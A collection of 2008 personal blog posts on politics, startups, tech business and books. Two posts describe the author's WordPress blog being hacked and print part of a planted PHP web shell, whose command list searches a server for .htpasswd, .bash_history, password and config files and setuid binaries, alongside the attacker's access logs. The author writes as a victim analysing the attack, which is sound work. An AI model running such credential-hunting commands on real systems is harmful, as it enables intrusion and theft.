In a misguided move to try and control the cost of gas, the U.S. government is going
halt deliveries to the strategic oil reserve. The theory goes that the oil that would have gone into the reserve will now increase supply among other distribution channels and help meet demand, bringing prices down.
Why is this move misguided? These deliveries are only “one tenth of one percent” of oil on the market. It provides the illusion of help without any real chance of help.
Unfortunately the biggest reason this is the wrong move is that a move was made at all. Once again the U.S. government is showing it’s willing to actively keep gas prices low while failing to commit to alternative energy sources. This behavior forces the longer term energy strategy of the U.S. to rely on foreign energy reserves as it’s the lowest risk option. Leaders in government will then claim that drilling in Alaska is unavoidable, when in reality there was a completely different path to be taken.
The best move the U.S. government could have made in the face of rising petroleum prices is an indication that no moves will be made to try and lower the price artificially. This would force industry to focus on alternative energy sources and help us start to alleviate our dependence on foreign oil. If you look at the energy mix of other developed countries, policies promoting alternative sources have had a major impact.
The abundance of cheap energy and food enjoyed in the U.S. is at an end. Either the government can commit to a sound long term strategy or cling to the status quo. The choice will determine if the U.S. is still a world leader in 50 years.
John Edwards endorsed Barak Obama for President today. If that surprises you - it should. The news was rather sudden considering both Barak and Hillary have been courting John since he dropped out of the race. It seems that the inevitability of Barak’s nomination pushed him over the top and Mr. Edwards decided to join the winning team.
Why now, though? Why not wait until after the primary season is over? Waiting would allow him to maintain good standing with the Clintons. The obvious answer is that it would be too late for his endorsement to mean anything. The currency he has right now is the limited success he had in the primary himself and once the primary is over he becomes yet another senior member of the Democratic party. That means less exposure for him, as well as a longer road to a Vice President nomination. Now that the winner is all but assured it’s safe for him to endorse Barak without the fear of picking the wrong side.
A less obvious answer is that he is trying out for the Vice President’s spot. Barak has well documented difficulties with the white working class vote, which was John Edwards base before he dropped out and Hillary claimed it. Endorsing Barak now gives Obama a rare chance to see if it affects his performance in the few remaining Democratic primaries. In essence, Obama gets to test out the John Edwards effect.
If Obama performs better among working class white voters because of John Edwards help in the final few contests, expect John to be Obama’s choice for VP. If not, he may look elsewhere.
Jangl, once a high-flier in the world of “Voice 2.0″/Widgets/Social media, has met an unfortunate end and is in the process of selling off its assets. The founding team has found a new home in the business development group of Jajah where they can continue the pursuit of Voice 2.0.
I’ve met Michael (founder & CEO) who is both a great guy and a solid entrepreneur. I remain impressed at the series of deals he lined up for Jangl, knowing how hard it is to get those off the ground at a startup. Unfortunately, none of it was enough to overcome the odds.
As much as we try and delude ourselves here in Silicon Valley, the chances of any given startup succeeding - regardless of the skill of the team, the deals they put in place or their technology - are very low. For every huge acquisition by Google there are probably 50 other companies that tried the same thing but couldn’t make it work. Because of those overwhelming odds, SV startups often redefine success to make it seem more likely. Many companies celebrate venture funding, for example, and brag about the many millions of dollars they’ve raised.
Venture funding is a poor indicator of success, as the most successful companies raise the least and the more you raise the less likely you are to ever exit. Venture funding can also be a curse, as it seems that the core of the meltdown at Jangl was a disagreement between the investors and management. Venture capitalists are in the business to make money, not to make their startups successful - never forget that.
The best you can do after encountering failure in the startup space is to try again. I’m glad to see the Jangl team jumping right back in as part of another effort and I hope that it leads them to success. The chances are still against them, but luckily that never stops us from trying.
Marc Andreessen has a great post up on his blog (subscribe if you don’t already) describing the benefits of dual-class stock structures for public technology companies. Dual-class structures are where one class of shares (Class B) has more voting power than another class (Class A) even if Class A is numerically larger than Class B. It’s a way for a minority to control management of the company, while sharing the financial upside with a larger group.
In some cases, as Marc points out, this can be a good thing as it can help the founding management avoid the distractions of Wall St. In fact, you need to look no farther than Google or Warren Buffet to find examples of such a stock structure providing great benefits to their shareholders.
Unfortunately, this all strikes me as remarkably similar to the classical argument for Philosopher Kings. The concept of a “Philosopher King” was proposed by Plato in Book VII of The Republic and argues that the ideal governmental structure is an enlightened king (philosopher herein defined as someone focused on acquiring wisdom). An underlying argument is that the populace of the city-state ruled by the Philosopher King lacked the ability to perceive wisdom in the same way as a philosopher and were thus incapable of understanding how to rule.
With that in mind, according to Marc these are the preconditions necessary for a dual stock structure to be successful:
- The key leaders of the company — typically the founders — who will own the controlling Class B shares, are also major economic shareholders in the company. They own a significant portion of the company and are therefore highly incented to maximize the value of the company over time.
- The key leaders of the company who own the controlling Class B shares have a long-term goal of building a major franchise, and the commitment required to execute against that goal.
- The controlling Class B shareholders have a commitment to treat Class A shareholders fairly and equally in all respects other than voting power.
- All public shareholders understand what they are getting into up front — no bait and switch.
Points 2 and 3 are the key problems here, as they strike me as idealistic as Plato’s original proposal. In reality, there never were (or will be) true Philosopher Kings. Unfortunately the closest we’ve come are Enlightened Absolutism or Benevolent Dictators (depending on how nice you want to be). That is because no single person can objectively way and govern to maximize the interests of all interested parties, especially if they are an involved party themselves.
Even if you were to fashion an ideal ruler, what happens when that ruler dies and passes their rule on to their children? That’s exactly the problem that plagued the NY Times who had a dual stock structure giving voting control to the members of the Ochs-Sulzberger. Does that mean that when the founders or original management move on you remove the Class B stock structure? Good luck with that, whoever inherits that stock controls the company and they will make that decision.
Maybe the saving grace of dual-class stock structures is Marc’s point #4 which is that they are well known to potential investors, so everyone knows what they are getting: a chance to bet on a few people. Because unlike most companies, those people aren’t accountable to anyone else.
I’m sure you’ve read by now that Microsoft withdrew its bid for Yahoo!. Depending on whom you listen to this is either because Jerry Yang was stubborn, Steve Ballmer is unstable or the real challenges to getting a deal done (regulatory, cultural, financial) became apparent over the past few weeks.
So, what happens next?
- Yahoo!’s stock will drop back into the teens, where it lived before the offer.
- Microsoft will go back to trying to figure out how to sell Vista, improve sales on the Xbox 360 and more half-baked ideas like the Zune.
- Yahoo! will continue with it’s open initiative and try and use it to generate revenue growth so that Jerry Yang doesn’t get both fired and sued by the shareholders.
- Microsoft will claim it’s Live strategy is working online as they continue to lose to Google.
Interestingly, Microsoft did give Yahoo! something even after walking away from the deal: a real sense of urgency. Speaking to anyone at Yahoo! before the offer you would learn that they knew they would have trouble staying independent unless they turned things around, but lacked the organizational urgency to make things happen. Microsoft steps in with Yahoo!’s greatest fear and all of a sudden Yahoo! is more prolific in 4 months that it was in 2 years. Yahoo! unveiled their open platform intitiative and moved Open Search (Search Monkey) into beta in just a few months. They pushed hard in mobile, both expanding the reach of Go and announcing innovations like oneConnect and onePlace.
Even Jerry Yang, with his storied history at Yahoo!, got bogged down in the toxic corporate culture that had developed during Terry Semel’s reign. An inexperienced executive, Jerry lacked the ability to instill the necessary urgency to get things done on his own. Steve Ballmer did him a favor and scared the hell out of his company. Now it’s up to Yang & Co. to see if they can do anything with it. If not, expect Microsoft to come back again at a lower price. That is probably even more motivation for Yahoo! to deliver.
One of the great things about blogging is that I can go back and revisit different points in my life and remember what I was thinking about back then. That might seem silly, but I think about a lot of different things and often forget about the context of events. The color fades on the annuals of my memory, so to speak.
On March 31 I turned 30, or graduated from my twenties depending on whether you’re a glass half-full or half-empty person. At the time I was ambivalent as I tend to be happy in the here and now, so the numeric value of my age doesn’t really bother me. Surprisingly, a lot of people I know had a tough time dealing with that number and the corresponding realization that we’re not young anymore.
Today, I went back to revisit my posting from last year’s birthday when I turned 29 (read it yourself here). My first thought on reading it was that maybe I’m not a horrible blogger afterall. My second thought, more useful, was that I’m glad I was so happy back then.
So, instead of more lists or witty observations, I merely hope that next year at this time I’ll be writing another happy post about how great the previous year has been. With any luck, I’ll make this a habit every year until I wake up one day and realize that I’ve had a wonderful life.
Because, in the end, that’s really what I hope for.
First, you have to admit that Gang Leader for a Day from Sudhir Venkatesh has a great title. It’s one of those titles that makes you want to read the book regardless of what it’s about. I’m going to go out on a limb and say that the title alone probably sold 30% of the copies of this book. The other 70% were sold because Sudhir was mentioned in Freakonomics.
The good news is that the book itself lives up to the promise of the title. Sudhir was in fact invited to be a gang leader for a day back in the 1980s when he was a graduate student in sociology at the University of Chicago studying the economics of a crack gang. The story is told biographically instead of as a study so it makes the entire story extremely personal and answers all those questions that you have: How did he get mixed up in crack gangs? What does it mean to be a gang leader? What is being in a gang really like? The story reads more like a novel than a recounting of actual events, so I suspect that some liberties were taken to get the desired result. Even so, the content is engaging.
If you like sociology and are curious how gangs work from the inside, I encourage you to pick it up.
If you’ve been wondering where this blog has been for the past few days, it was hacked AGAIN. I sent a detailed email to the Wordpress security team describing the attack and got this in return:
WP 2.1.2 is a really old version of WordPress and there are multiple exploits for it. You should upgrade to 2.3.3 as soon as possible and change the passwords on all your accounts!
No kidding, really? I mean, seriously, that is weak. There is clearly something going on across the Wordpress community where blogs are being compromised with these new attacks. Playing dumb does not help.
Anyway, I took the blog down for a while until I had the time to upgrade to 2.5. We’re now upgraded and back in action. Hopefully still irreverent. Mildly safer from attacks if the above email represents the best of Wordpress security.
NOTE: If you do upgrade to fix the attack, note that worm installs a hidden plugin that includes links in the footer of every page. You have to make sure you go into the database and remove the plugin or else it’ll still be there when you upgrade as well. Check ‘active_plugins’ in the options table.
So I just posted to my blog and couldn’t figure out why the page didn’t look quite right. The image I included in the post along with the sidebar widgets did not appear, which was strange. Equally strange was that when I logged into the Wordpress console all plugins were turned off, including Akismet, which means that had I allowed commenting without approvals my blog would have been overrun. My blog got hacked.
The culprit seems to be something called 3rbsmag which can do some nasty things to your machine if you let it run php files. The attack, as far as I can tell, starts with a Wordpress vulnerability that allows it to gain access to the admin panel. It then turns off all plugins (and hence all protection) which changing the “uploads” directory to the tmp directory on your server. It then uploads two files, both php scripts, which do some nasty things to your server. You can download the scripts below, just don’t accidentally run them as PHP locally:
3rbsmag.txt
3rbsmag1.txt
You can tell what it’s up to from this very simple part of the code:
if (!$win){
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name "config*""),
array("find config* files in current dir", "find . -type f -name "config*""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}
Basically, if you have a windows box it does a dump of available ports, but if you are on a *nix machine it downloads your life.
As far as I can tell, if these php files were at all accessible they would give the person visiting the page unfettered access to most of your system. I can use some help analyzing it, so please feel free to help in the comments.
If you notice my system is compromised, please let me know. 
UPDATE 3/27 @ 11:44pm
I’ve continued digging and found the access logs that correspond to the attacks. It looks like my server was hit twice - once on Sunday, March 23, 2008, 12:58:44 AM and once on Monday, March 24, 2008, 7:59:49 PM as those were the times the two 3rbsmag files were created. Below are the server logs from that time period, and you’ll notice the same IP address is responsible for both:
207.210.112.209 - - [23/Mar/2008:00:58:42 -0700] “POST /blog/wp-admin/options.php HTTP/1.0″ 200 1252
207.210.112.209 - - [23/Mar/2008:00:58:43 -0700] “POST /blog/wp-admin/options.php HTTP/1.0″ 302 432
207.210.112.209 - - [23/Mar/2008:00:58:43 -0700] “POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0″ 200 1160
207.210.112.209 - - [23/Mar/2008:00:58:44 -0700] “POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0″ 302 -
207.210.112.209 - - [23/Mar/2008:00:58:46 -0700] “POST /blog/wp-admin/options.php HTTP/1.0″ 200 1232
207.210.112.209 - - [23/Mar/2008:00:58:46 -0700] “POST /blog/wp-admin/options.php HTTP/1.0″ 302 432
207.210.112.209 - - [23/Mar/2008:00:58:47 -0700] “GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0″ 200 1174
207.210.112.209 - - [23/Mar/2008:07:17:52 -0700] “POST /blog/?23dfeefd3sf2c HTTP/1.1″ 200 7
207.210.112.209 - - [23/Mar/2008:13:50:38 -0700] “HEAD /blog/wp-admin/ HTTP/1.1″200 -
207.210.112.209 - - [24/Mar/2008:19:59:47 -0700] “POST /blog/wp-admin/options.php HTTP/1.0″ 200 1252
207.210.112.209 - - [24/Mar/2008:19:59:48 -0700] “POST /blog/wp-admin/options.php HTTP/1.0″ 302 432
207.210.112.209 - - [24/Mar/2008:19:59:48 -0700] “POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0″ 200 1160
207.210.112.209 - - [24/Mar/2008:19:59:49 -0700] “POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0″ 302 -
207.210.112.209 - - [24/Mar/2008:19:59:50 -0700] “POST /blog/wp-admin/options.php HTTP/1.0″ 200 1232
207.210.112.209 - - [24/Mar/2008:19:59:51 -0700] “POST /blog/wp-admin/options.php HTTP/1.0″ 302 432
207.210.112.209 - - [24/Mar/2008:19:59:52 -0700] “GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0″ 200 1174
207.210.112.209 - - [25/Mar/2008:05:01:36 -0700] “POST /blog/?23dfeefd3sf2c HTTP/1.1″ 200 7
Who owns that IP address you ask? Thanks to the wonders of ARIN we find that it’s registered to:
OrgName: Global Net Access, LLCOrgID: GNAL-2
Address: 1100 White St SW
City: Atlanta
StateProv: GA
PostalCode: 30310
Which means we don’t really know as Global Net Access is an ISP. I will keep investigating.
Being the lemming that I am, I signed up for FriendFeed yesterday and created a meta-feed of all my social media activities. You should all subscribe to it. It’s very exciting, currently the most important destination on the web.
Seriously, I do think that FriendFeed is onto something. Twitter was attractive because it let you easily post what you were up to in a common location people could check. Unfortunately, it’s very hard to maintain that level of documentation so inevitably your posting drops off and then everyone has no idea what you’re up to. By automating the process of action recording, FriendFeed remedies this problem as it take no additional effort to tell someone what you’re up to - you can even pepper it with twitter updates to provide color.
I actually asked for a service just like FriendFeed last April (see here), and I’m surprised it took a year as the service is pretty simple. Unfortunately it’s given me an interesting problem. Below is a graph of all my social media outlets, with arrows representing where the RSS feeds are republished between the outlets.
Social Media Graph
As you can see, my blog gets republished on Facebook and FriendFeed, while Twitter and Delicious make it both to Tumblr and FriendFeed. Unfortunately that means I can’t feed Tumblr into FriendFeed without creating duplicates and FriendFeed can’t feed into Facebook. I know what you’re thinking: “Why not just cut out the dupes by just choosing one aggregation point”. Think you’re so smart, don’t you. Clearly it’s far too complex of a problem for me to tackle so I’m just going to leave things as is.
So, now I need another service. I need something that helps me visualize the flow of my social media since it’s quickly getting out of hand. I’ll look forward to seeing it in April 2009.
